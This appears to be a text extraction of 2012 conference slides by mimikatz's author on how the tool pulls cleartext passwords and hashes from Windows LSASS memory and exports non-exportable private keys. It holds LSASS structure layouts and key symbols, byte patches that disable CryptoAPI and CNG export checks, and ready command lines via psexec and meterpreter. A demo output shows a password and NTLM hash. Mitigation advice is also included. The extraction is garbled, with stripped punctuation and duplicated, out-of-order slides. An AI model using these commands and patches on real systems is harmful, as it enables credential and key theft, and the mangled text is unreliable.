mimikatz privilegedebug cryptopatchcng cryptopatchcapi cryptoexportCertificates
cryptoexportKeys exit
Password ndash PFX files are protected by this password mimikatz
Keys ndash When you import multiple time a certificate exportable or not Windows make duplicate keys
ndash When you delete a certificate Windows does not delete its private keyhellip funny isnrsquot it bull So yes mimikatz can export it
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 53 53
mimikatz crypto what we can do
mimikatz crypto what we can do
Exactly the same as for sekurlsa it will prevent access to accounts computer ndash no admin no admin no adminhellip
Basics ndash Use smartcardstoken for users certificates
ndash Use Hardware Security Modules (HSM) even SoftHSM
More in depth ndash See what Microsoft can do with TPM from Windows 8
bull Virtual SmartCard seems promising
ndash Verify vendors implementation (Lenovo Dell hellip) of TPM CSPKSP bull Their biometrics stuff was a little buggy )
Exactly the same as for sekurlsa it will prevent access to accounts computer ndash no admin no admin no adminhellip
Basics ndash Use smartcardstoken for users certificates
ndash Use Hardware Security Modules (HSM) even SoftHSM
More in depth ndash See what Microsoft can do with TPM from Windows 8
bull Virtual SmartCard seems promising
ndash Verify vendors implementation (Lenovo Dell hellip) of TPM CSPKSP bull Their biometrics stuff was a little buggy )
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 54 54
mimikatz what else can it do
mimikatz what else can it do
Play with minesweeper
Manipulate some handles
Pass the hash
Dump SAM AD
Stop event monitoring
Patch Terminal Server
Basic GPO bypass
Applocker SRP bypass
Driver ndash Play with tokens amp privileges
ndash Display SSDT x86 amp x64
ndash List minifilters actions
ndash List Notifications (process thread image registry)
ndash List Objects hooks and procedures
ndash hellip
hellip
Play with minesweeper
Manipulate some handles
Pass the hash
Dump SAM AD
Stop event monitoring
Patch Terminal Server
Basic GPO bypass
Applocker SRP bypass
Driver ndash Play with tokens amp privileges
ndash Display SSDT x86 amp x64
ndash List minifilters actions
ndash List Notifications (process thread image registry)
ndash List Objects hooks and procedures
ndash hellip
hellip
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 55 55
mimikatz thatrsquos all folks
mimikatz thatrsquos all folks
Thanksrsquo to Merci agrave
ndash my girlfriend for her support (her LSASS crashed few times)
ndash Application Security Forum to offer me this great opportunity bull Partners and Sponsors for sure
ndash Microsoft to always consider it as normalacceptable
ndash Security friendscommunity for their ideas amp challenges bull nagual newsoft mubix hellip
ndash You for your attention
Questions
Donrsquot be shy )
especially if you have written the corresponding slide number
Thanksrsquo to Merci agrave
ndash my girlfriend for her support (her LSASS crashed few times)
ndash Application Security Forum to offer me this great opportunity bull Partners and Sponsors for sure
ndash Microsoft to always consider it as normalacceptable
ndash Security friendscommunity for their ideas amp challenges bull nagual newsoft mubix hellip
ndash You for your attention
Questions
Donrsquot be shy )
especially if you have written the corresponding slide number
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 56 56
Blog Source Code amp Contact Blog Source Code amp Contact
blog httpbloggentilkiwicom mimikatz httpbloggentilkiwicommimikatz source httpscodegooglecompmimikatz email benjamingentilkiwicom
blog httpbloggentilkiwicom mimikatz httpbloggentilkiwicommimikatz source httpscodegooglecompmimikatz email benjamingentilkiwicom
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 57 57
mimikatz sekurlsa kerberos (nt5) workflow
mimikatz sekurlsa kerberos (nt5) workflow
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 29 29
LsaUnprotectMemory
LsaEnumerateLogonSessions
for each LUID
password in clear
typedef struct _KIWI_KERBEROS_LOGON_SESSION struct _KIWI_KERBEROS_LOGON_SESSION Flink struct _KIWI_KERBEROS_LOGON_SESSION Blink DWORD UsageCount PVOID unk0 PVOID unk1 PVOID unk2 DWORD unk3 DWORD unk4 PVOID unk5 PVOID unk6 PVOID unk7 LUID LocallyUniqueIdentifier
ifdef _M_IX86 DWORD unk8
endif DWORD unk9 DWORD unk10 PVOID unk11 DWORD unk12 DWORD unk13 PVOID unk14 PVOID unk15 PVOID unk16 [hellip] LSA_UNICODE_STRING UserName LSA_UNICODE_STRING Domaine LSA_UNICODE_STRING Password
KIWI_KERBEROS_LOGON_SESSION PKIWI_KERBEROS_LOGON_SESSION
kerberosKerbLogonSessionList
search linked list for LUID
KIWI_LIVESSP_PRIKIWI_LIVESSP_PRIMARY_CREDENTIAL
mimikatz sekurlsa demo time
mimikatz sekurlsa demo time
Final sekurlsa demo sekurlsalogonPasswords full
Final sekurlsa demo sekurlsalogonPasswords full
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 30 30
mimikatz sekurlsa kerberos ldquohu rdquo
mimikatz sekurlsa kerberos ldquohu rdquo
Ok It workshellip
But why
Not at all logon on NT5 (can need an unlock)
From my understanding of Microsoft explanations
ndash no need of passwords for the Kerberos protocolhellip
ndash all is based on the hash (not very sexy too)
Microsoftrsquos implementation of Kerberos is full of logicalhellip
ndash For password auth
bull password hash for shared secret but keeping password in memory
ndash For full smartcard auth
bull No password on client
bull No hash on client
ndash NTLM hash on clienthellip
ndash KDC sent it back as a gift
Ok It workshellip
But why
Not at all logon on NT5 (can need an unlock)
From my understanding of Microsoft explanations
ndash no need of passwords for the Kerberos protocolhellip
ndash all is based on the hash (not very sexy too)
Microsoftrsquos implementation of Kerberos is full of logicalhellip
ndash For password auth
bull password hash for shared secret but keeping password in memory
ndash For full smartcard auth
bull No password on client
bull No hash on client
ndash NTLM hash on clienthellip
ndash KDC sent it back as a gift
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 31 31
mimikatz sekurlsa mimikatz sekurlsa
All passwords in memory are encrypted but in a reversible way to be used
We used LsaUnprotecMemory in the LSASS context to decrypt them
ndash This function rely on LsaEncryptMemory from lsasrvdll
For that we previously inject a DLL (sekurlsadll) in the LSASS process to take benefits of its keys when we called it
Can it be fun to decrypt outside the process ndash Yes it ishellip no more injection just reading memory of LSASS processhellip
mimikatz can use lsasrvdll too and ldquoimportsrdquo LSASS initialized keys ndash When we call LsaEncryptMemory in mimikatz with all keys imported from LSASS we have
the same comportments than when we are in LSASS
All passwords in memory are encrypted but in a reversible way to be used
We used LsaUnprotecMemory in the LSASS context to decrypt them
ndash This function rely on LsaEncryptMemory from lsasrvdll
For that we previously inject a DLL (sekurlsadll) in the LSASS process to take benefits of its keys when we called it
Can it be fun to decrypt outside the process ndash Yes it ishellip no more injection just reading memory of LSASS processhellip
mimikatz can use lsasrvdll too and ldquoimportsrdquo LSASS initialized keys ndash When we call LsaEncryptMemory in mimikatz with all keys imported from LSASS we have
the same comportments than when we are in LSASS
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 32 32
LsaUnprotectMemory
mimikatz sekurlsa LsaEncryptMemory NT5
mimikatz sekurlsa LsaEncryptMemory NT5
Depending on the size of the secret LsaEncryptMemory use
ndash RC4
ndash DESx
Depending on the size of the secret LsaEncryptMemory use
ndash RC4
ndash DESx
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 33 33
g_pRandomKey
g_cbRandomKey
BYTE[g_cbRandomKey]
DWORD 256
BYTE[g_cbRandomKey]
g_pDESXKey BYTE[144]
BYTE[144]
g_Feedback BYTE[8]
lsass
lsass
lsasrv
lsasrv
lsass
lsass
lsasrv
lsasrv
mimikatz
mimikatz
lsasrv
lsasrv
copyhellip
mimikatz sekurlsa LsaEncryptMemory NT6
mimikatz sekurlsa LsaEncryptMemory NT6
Depending on the size of the secret LsaEncryptMemory use
ndash 3DES
ndash AES
Depending on the size of the secret LsaEncryptMemory use
ndash 3DES
ndash AES
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 34 34
InitializationVector BYTE[16]
lsass
lsass
lsasrv
lsasrv
lsass
lsass
lsasrv
lsasrv
mimikatz
mimikatz
copyhellip
h3DesKey
typedef struct _KIWI_BCRYPT_KEY_DATA DWORD size DWORD tag DWORD type DWORD unk0 DWORD unk1 DWORD unk2 DWORD unk3 PVOID unk4 BYTE data etc KIWI_BCRYPT_KEY_DATA PKIWI_BCRYPT_KEY_DATA
hAesKey
lsasrv
lsasrv
typedef struct _KIWI_BCRYPT_KEY DWORD size DWORD type PVOID unk0 PKIWI_BCRYPT_KEY_DATA cle PVOID unk1 KIWI_BCRYPT_KEY PKIWI_BCRYPT_KEY
mimikatz sekurlsa memo
mimikatz sekurlsa memo
Security Packages
Protection Keys
Security Packages
Protection Keys
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 35 35
Package Symbols Type
tspkg tspkgTSGlobalCredTable RTL_AVL_TABLE
wdigest wdigestl_LogSessList LIST_ENTRY
livessp livesspLiveGlobalLogonSessionList LIST_ENTRY
kerberos (nt5) kerberosKerbLogonSessionList LIST_ENTRY
kerberos (nt6) kerberosKerbGlobalLogonSessionTable RTL_AVL_TABLE
msv1_0 lsasrvLogonSessionList lsasrvLogonSessionListCount
LIST_ENTRY ULONG
Key NT 5 Symbols
RC4 lsasrvg_cbRandomKey lsasrvg_pRandomKey
DESx lsasrvg_pDESXKey lsasrvg_Feedback
Key NT 6 Symbols
lsasrvInitializationVector
3DES lsasrvh3DesKey
AES lsasrvhAesKey
mimikatz sekurlsa memo
mimikatz sekurlsa memo
Some commands mimikatz privilegedebug sekurlsalogonPasswords full exit
psexec windows -s -c cmimikatzWin32mimikatzexe sekurlsalogonPasswords full exit
meterpreter gt execute -H -c -i -m -f pentestpasswordsmimikatzmimikatz_x86exe
Some commands mimikatz privilegedebug sekurlsalogonPasswords full exit
psexec windows -s -c cmimikatzWin32mimikatzexe sekurlsalogonPasswords full exit
meterpreter gt execute -H -c -i -m -f pentestpasswordsmimikatzmimikatz_x86exe
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 36 36
mimikatz 10 x64 (RC) Traitement du Kiwi (Aug 2 2012 013228) httpbloggentilkiwicommimikatz mimikatz privilegedebug Demande dACTIVATION du privilegravege SeDebugPrivilege OK mimikatz sekurlsalogonPasswords full Authentification Id 0234870 Package dauthentification NTLM Utilisateur principal Gentil Kiwi Domaine dauthentification vm-w8-rp-x msv1_0 Utilisateur Gentil Kiwi Domaine vm-w8-rp-x Hash LM d0e9aee149655a6075e4540af1f22d3b Hash NTLM cc36cf7a8514893efccd332446158b1a kerberos Utilisateur Gentil Kiwi Domaine vm-w8-rp-x Mot de passe waza1234 wdigest Utilisateur Gentil Kiwi Domaine vm-w8-rp-x Mot de passe waza1234 tspkg Utilisateur Gentil Kiwi Domaine vm-w8-rp-x Mot de passe waza1234 livessp nt (LUID KO)
mimikatz sekurlsa what we can do
mimikatz sekurlsa what we can do
Basics ndash No physical access to computer (first step to pass the hash then pass the pass) ndash No admin rights system rights debug privileges (hellip) ndash Disable local admin accounts ndash Strong passwords (haha it was a joke so useless ) ndash For privileged account network login instead of interactive (when possible) ndash Audit pass the hash keeps traces and can lock accounts ndash No admin rights system rights debug privileges even VIP ndash Use separated network (or forest) for privileged tasks
More in depth ndash Force strong authentication (SmartCard amp Token) $ euro ndash Short validity for Kerberos tickets ndash No delegation ndash Disable NTLM (available with NT6) ndash No exotic
bull biometrics (it keeps password somewhere and push it to Windows) bull single sign on
ndash Stop shared secrets for authentication push Public Private stuff (like keys )) ndash Let opportunities to stop retro compatibility ndash Disable faulty providers
bull Is it supported by Microsoft bull Even if you can disable LiveSSP TsPkg and WDigest will you disable Kerberos and msv1_0
Basics ndash No physical access to computer (first step to pass the hash then pass the pass) ndash No admin rights system rights debug privileges (hellip) ndash Disable local admin accounts ndash Strong passwords (haha it was a joke so useless ) ndash For privileged account network login instead of interactive (when possible) ndash Audit pass the hash keeps traces and can lock accounts ndash No admin rights system rights debug privileges even VIP ndash Use separated network (or forest) for privileged tasks
More in depth ndash Force strong authentication (SmartCard amp Token) $ euro ndash Short validity for Kerberos tickets ndash No delegation ndash Disable NTLM (available with NT6) ndash No exotic
bull biometrics (it keeps password somewhere and push it to Windows) bull single sign on
ndash Stop shared secrets for authentication push Public Private stuff (like keys )) ndash Let opportunities to stop retro compatibility ndash Disable faulty providers
bull Is it supported by Microsoft bull Even if you can disable LiveSSP TsPkg and WDigest will you disable Kerberos and msv1_0
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 37 37
mimikatz crypto what is it
mimikatz crypto what is it
A little module that I wrote to ndash play with Windows Cryptographic API CNG and RSA keys
ndash automate export of certificateskeys bull Even those which are ldquonotrdquo exportable
What crypto module can do ndash List
bull Providers
bull Stores
bull Certificates
bull Keys
ndash Export bull Certificates
ndash public in DER format
ndash with private keys in PFX format
bull Private keys in PVK format ndash itrsquos cool OpenSSL can deal with it too
ndash Patch bull CryptoAPI in mimikatz context
bull CNG in LSASS context (again )
A little module that I wrote to ndash play with Windows Cryptographic API CNG and RSA keys
ndash automate export of certificateskeys bull Even those which are ldquonotrdquo exportable
What crypto module can do ndash List
bull Providers
bull Stores
bull Certificates
bull Keys
ndash Export bull Certificates
ndash public in DER format
ndash with private keys in PFX format
bull Private keys in PVK format ndash itrsquos cool OpenSSL can deal with it too
ndash Patch bull CryptoAPI in mimikatz context
bull CNG in LSASS context (again )
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 38 38
mod_mimikatz_crypto
mimikatz crypto how itrsquos protected
mimikatz crypto how itrsquos protected
Private keys are DPAPI protected ndash You cannot reuse private key files on another computer
bull At least without the master keys andor password of users
ComputerUser can load their own keys because they have enough secrets to do it (ex session opened) ndash Yes a computerserver open a ldquosessionrdquo
ExportUsage can be limited by ndash Password
ndash Popup
ndash ExportArchive flag no present
Private keys are DPAPI protected ndash You cannot reuse private key files on another computer
bull At least without the master keys andor password of users
ComputerUser can load their own keys because they have enough secrets to do it (ex session opened) ndash Yes a computerserver open a ldquosessionrdquo
ExportUsage can be limited by ndash Password
ndash Popup
ndash ExportArchive flag no present
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 39 39
Constraint for most user Unavailable for computer keys
certutil -importpfx mycertp12 NoExport certutil -csp Microsoft Enhanced Cryptographic Provider v10 -importpfx mycertp12 NoExport
mimikatz crypto capi how it works
mimikatz crypto capi how it works
ldquoMicrosoft CryptoAPI provides a secure interface for the cryptographic functionality that is supplied by the installable cryptographic service provider (CSP) modules CSPs perform all cryptographic operations and manage private keys CSPs can be implemented in software as well as in hardwarerdquo ndash httptechnetmicrosoftcomlibrarycc962093aspx
Processes (mimikatz IIS Active Directory Internet Explorer yourappsherehellip) load some DLL to deal with different cryptographic stuff CSP (keys) smartcard reader hellip ndash cryptdlldll rsaenhdll hellip
Process deal with cryptographic keys by this APIhellip
ldquoMicrosoft CryptoAPI provides a secure interface for the cryptographic functionality that is supplied by the installable cryptographic service provider (CSP) modules CSPs perform all cryptographic operations and manage private keys CSPs can be implemented in software as well as in hardwarerdquo ndash httptechnetmicrosoftcomlibrarycc962093aspx
Processes (mimikatz IIS Active Directory Internet Explorer yourappsherehellip) load some DLL to deal with different cryptographic stuff CSP (keys) smartcard reader hellip ndash cryptdlldll rsaenhdll hellip
Process deal with cryptographic keys by this APIhellip
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 40 40
mimikatz crypto capi how itrsquos exported ( level)
mimikatz crypto capi how itrsquos exported ( level)
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 41 41
Process
CryptoAPI and RSA CSP
Exportable
Load Private Key
Exported Key
yes
NTE_BAD_KEY_STATE
no
DPAPI Decode
PLAYSKOOL
Ask to export Key
mimikatz crypto patchcapi because I own my process
mimikatz crypto patchcapi because I own my process
When we want to export a certificate with its private key (or only the key) it goes in rsaenhCPExportKey
This function do all the work to prepare the export and check if the key is exportable
When we want to export a certificate with its private key (or only the key) it goes in rsaenhCPExportKey
This function do all the work to prepare the export and check if the key is exportable
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 42 42
mimikatz cryptoexportCertificates Emplacement CERT_SYSTEM_STORE_CURRENT_USERMy - Benjamin Delpy Container Cleacute 470ADFBA-8718-4014-B05E-B30776B75A03 Provider Microsoft Enhanced Cryptographic Provider v10 Type AT_KEYEXCHANGE Exportabiliteacute NON Taille cleacute 2048 Export priveacute dans CERT_SYSTEM_STORE_CURRENT_USER_My_0_Benjamin Delpypfx KO (0x8009000b) Cleacute non valide pour lutilisation dans leacutetat speacutecifieacute Export public dans CERT_SYSTEM_STORE_CURRENT_USER_My_0_Benjamin Delpyder OK
================ Certificat 0 ================ Numeacutero de seacuterie 112169417a1c3ef46a301f99385f50680fa0 Eacutemetteur CN=GlobalSign CodeSigning CA - G2 O=GlobalSign nv-sa C=BE Objet CN=Benjamin Delpy C=FR Il ne sagit pas dun certificat racine Hach cert (sha1) ab 9e 92 b9 43 ed 47 d9 15 bc 26 93 9e 24 a5 83 03 ac aa 7e Conteneur de cleacute = 470ADFBA-8718-4014-B05E-B30776B75A03 Fournisseur = Microsoft Enhanced Cryptographic Provider v10 La cleacute priveacutee NE PEUT PAS ecirctre exporteacutee Succegraves du test de cryptage CertUtil -exportPFX EacuteCHEC de la commande 0x8009000b (-2146893813) CertUtil Cleacute non valide pour lutilisation dans leacutetat speacutecifieacute
Exportable
mimikatz crypto patchcapi because I own my process
mimikatz crypto patchcapi because I own my process
So what A module in my own process return that I canrsquot do something CryptoAPI is in my memory space letrsquos patch it
I wrote ldquo4rdquo bytes in my memory space
So what A module in my own process return that I canrsquot do something CryptoAPI is in my memory space letrsquos patch it
I wrote ldquo4rdquo bytes in my memory space
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 43 43
text0AC0B7CB 0F 85 33 C7 FF FF jnz continue_key_export_or_archive
text0AC0B7CB 90 nop
text0AC0B7CC E9 33 C7 FF FF jmp continue_key_export_or_archive
text0AC1F749 0F 85 B6 3B FF FF jnz continue_key_export_or_archive_prepare
text0AC1F749 90 nop
text0AC1F74A E9 B6 3B FF FF jmp continue_key_export_or_archive_prepare
mimikatz crypto patchcapi demo time
mimikatz crypto patchcapi demo time
Import export import as not exportablehellip export
Import export import as not exportablehellip export
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 44 44
mimikatz crypto patchcapi limitations
mimikatz crypto patchcapi limitations
Because ndash Irsquom lazy
ndash Irsquove seen in majority of case RSA keys for real life use bull Elliptic Curve a littlehellip
mimikatz cryptopatchcapi only deal with ndash Microsoft Base Cryptographic Provider v10
ndash Microsoft Enhanced Cryptographic Provider v10
ndash Microsoft Enhanced RSA and AES Cryptographic Provider
ndash Microsoft RSA SChannel Cryptographic Provider
ndash Microsoft Strong Cryptographic Provider
hellipall based on rsaenhdll
Because ndash Irsquom lazy
ndash Irsquove seen in majority of case RSA keys for real life use bull Elliptic Curve a littlehellip
mimikatz cryptopatchcapi only deal with ndash Microsoft Base Cryptographic Provider v10
ndash Microsoft Enhanced Cryptographic Provider v10
ndash Microsoft Enhanced RSA and AES Cryptographic Provider
ndash Microsoft RSA SChannel Cryptographic Provider
ndash Microsoft Strong Cryptographic Provider
hellipall based on rsaenhdll
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 45 45
mimikatz crypto cng how it works
mimikatz crypto cng how it works
ldquoCryptography API Next Generation (CNG) is the long-term replacement for the CryptoAPI CNG is designed to be extensible at many levels and cryptography agnostic in behaviorrdquo ndash httpmsdnmicrosoftcomlibrarywindowsdesktopaa376210aspx
ldquoTo comply with common criteria (CC) requirements the long-lived keys must be isolated so that they are never present in the application process CNG currently supports the storage of asymmetric private keys by using the Microsoft software KSP that is included with Windows Server 2008 and Windows Vista and installed by default
This time keys operations are not made in the ldquouserrdquo process context
Process use RPC to call ldquoKey isolation servicerdquo (keyiso) functions
It seems more secure than CryptoAPIhellip ndash It is but itrsquos not perfecthellip
ldquoCryptography API Next Generation (CNG) is the long-term replacement for the CryptoAPI CNG is designed to be extensible at many levels and cryptography agnostic in behaviorrdquo ndash httpmsdnmicrosoftcomlibrarywindowsdesktopaa376210aspx
ldquoTo comply with common criteria (CC) requirements the long-lived keys must be isolated so that they are never present in the application process CNG currently supports the storage of asymmetric private keys by using the Microsoft software KSP that is included with Windows Server 2008 and Windows Vista and installed by default
This time keys operations are not made in the ldquouserrdquo process context
Process use RPC to call ldquoKey isolation servicerdquo (keyiso) functions
It seems more secure than CryptoAPIhellip ndash It is but itrsquos not perfecthellip
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 46 46
mimikatz crypto cng how itrsquos exported ( level)
mimikatz crypto cng how itrsquos exported ( level)
KeyIso Service (LSASS Process)
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 47 47
Process
CNG
Exportable
Load Private Key
Exported Key
yes
NTE_NOT_SUPPORTED
RPC
DPAPI Decode
PLAYSKOOL
Ask to export Key
NT6 System protected process ML_SYSTEM SYSTEM_MANDATORY_LABEL_NO_WRITE_UP SYSTEM_MANDATORY_LABEL_NO_READ_UP
no
mimikatz crypto patchcng because sometimes I own LSASS
mimikatz crypto patchcng because sometimes I own LSASS
When we want to export a certificate with its private key (or only the key) RPC calls lead to lsass(keyiso)ncryptSPCryptExportKey
This function do all the work to prepare the export and check if the key is exportable
When we want to export a certificate with its private key (or only the key) RPC calls lead to lsass(keyiso)ncryptSPCryptExportKey
This function do all the work to prepare the export and check if the key is exportable
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 48 48
mimikatz cryptoexportKeys [user] Cleacutes CNG - cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318 Exportabiliteacute NON Taille cleacute 2048 Export priveacute dans cng_user_0_cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318pvk KO mod_cryptonggetPrivateKeyPrivateKeyBlobToPVK (0x80090029) Lopeacuteration demandeacutee nest pas prise en charge
Exportable
mimikatz crypto patchcng because sometimes I own LSASS
mimikatz crypto patchcng because sometimes I own LSASS
This time checks and keys are in LSASS processhellip And what
I wrote ldquo1rdquo byte in LSASS memory spacehellip
This time checks and keys are in LSASS processhellip And what
I wrote ldquo1rdquo byte in LSASS memory spacehellip
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 49 49
text6C815210 75 1C jnz short continue_key_export
text6C815210 EB 1C jmp short continue_key_export
mimikatz crypto patchcng demo time
mimikatz crypto patchcng demo time
Import export import as not exportablehellip export again
Import export import as not exportablehellip export again
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 50 50
mimikatz crypto patchcng limitations
mimikatz crypto patchcng limitations
Patch operation needs some privileges ndash Admin (debug privilege)
ndash SYSTEM
mimikatz cryptopatchcng only deal with ndash Microsoft Software Key Storage Provider (maybe others algs than RSA)
Not a limitation of mimikatz but MMC addin for certificates cannot export CNG certificateshellip even those that are exportable (hu ) ndash certutil canhellip
Patch operation needs some privileges ndash Admin (debug privilege)
ndash SYSTEM
mimikatz cryptopatchcng only deal with ndash Microsoft Software Key Storage Provider (maybe others algs than RSA)
Not a limitation of mimikatz but MMC addin for certificates cannot export CNG certificateshellip even those that are exportable (hu ) ndash certutil canhellip
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 51 51
mimikatz crypto patchcng bonus
mimikatz crypto patchcng bonus
After one admin patched LSASS all users of current system benefit of extra exports
ndash until reboot KeyIso service restart
Some others programs that doesnrsquot check the export flag before asking export can work too
ndash Yeah like the old good one certutil
After one admin patched LSASS all users of current system benefit of extra exports
ndash until reboot KeyIso service restart
Some others programs that doesnrsquot check the export flag before asking export can work too
ndash Yeah like the old good one certutil
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 52 52
CUsersGentil KiwiDesktopgtcertutil -user -p export_waza -privatekey -exportpfx cng_user_noexport testpfx MY ================ Certificat 1 ================ [hellip] Hach cert (sha1) dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b Conteneur de cleacute = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318 Fournisseur = Microsoft Software Key Storage Provider La cleacute priveacutee NE PEUT PAS ecirctre exporteacutee Succegraves du test de chiffrement CertUtil -exportPFX EacuteCHEC de la commande 0x8009000b (-2146893813) CertUtil Cleacute non valide pour lutilisation dans leacutetat speacutecifieacute CUsersGentil KiwiDesktopgtcertutil -user -p export_waza -privatekey -exportpfx cng_user_noexport testpfx MY ================ Certificat 1 ================ [hellip] Hach cert (sha1) dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b Conteneur de cleacute = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318 Fournisseur = Microsoft Software Key Storage Provider Succegraves du test de chiffrement CertUtil -exportPFX La commande sest termineacutee correctement
mimikatz crypto memo
mimikatz crypto memo
Some commands mimikatz cryptopatchcapi cryptoexportCertificates exit
psexec windows -s -c cmimikatzWin32mimikatzexe cryptopatchcapi cryptopatchcng
cryptoexportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE cryptoexportKeys computer exit
mimikatz cryptoexportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE Remote Desktop
mimikatz privilegedebug cryptopatchcng cryptopatchcapi cryptoexportCertificates
cryptoexportKeys exit
Password ndash PFX files are protected by this password mimikatz
Keys ndash When you import multiple time a certificate exportable or not Windows make duplicate keys
ndash When you delete a certificate Windows does not delete its private keyhellip funny isnrsquot it bull So yes mimikatz can export it
Some commands mimikatz cryptopatchcapi cryptoexportCertificates exit
psexec windows -s -c cmimikatzWin32mimikatzexe cryptopatchcapi cryptopatchcng
cryptoexportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE cryptoexportKeys computer exit
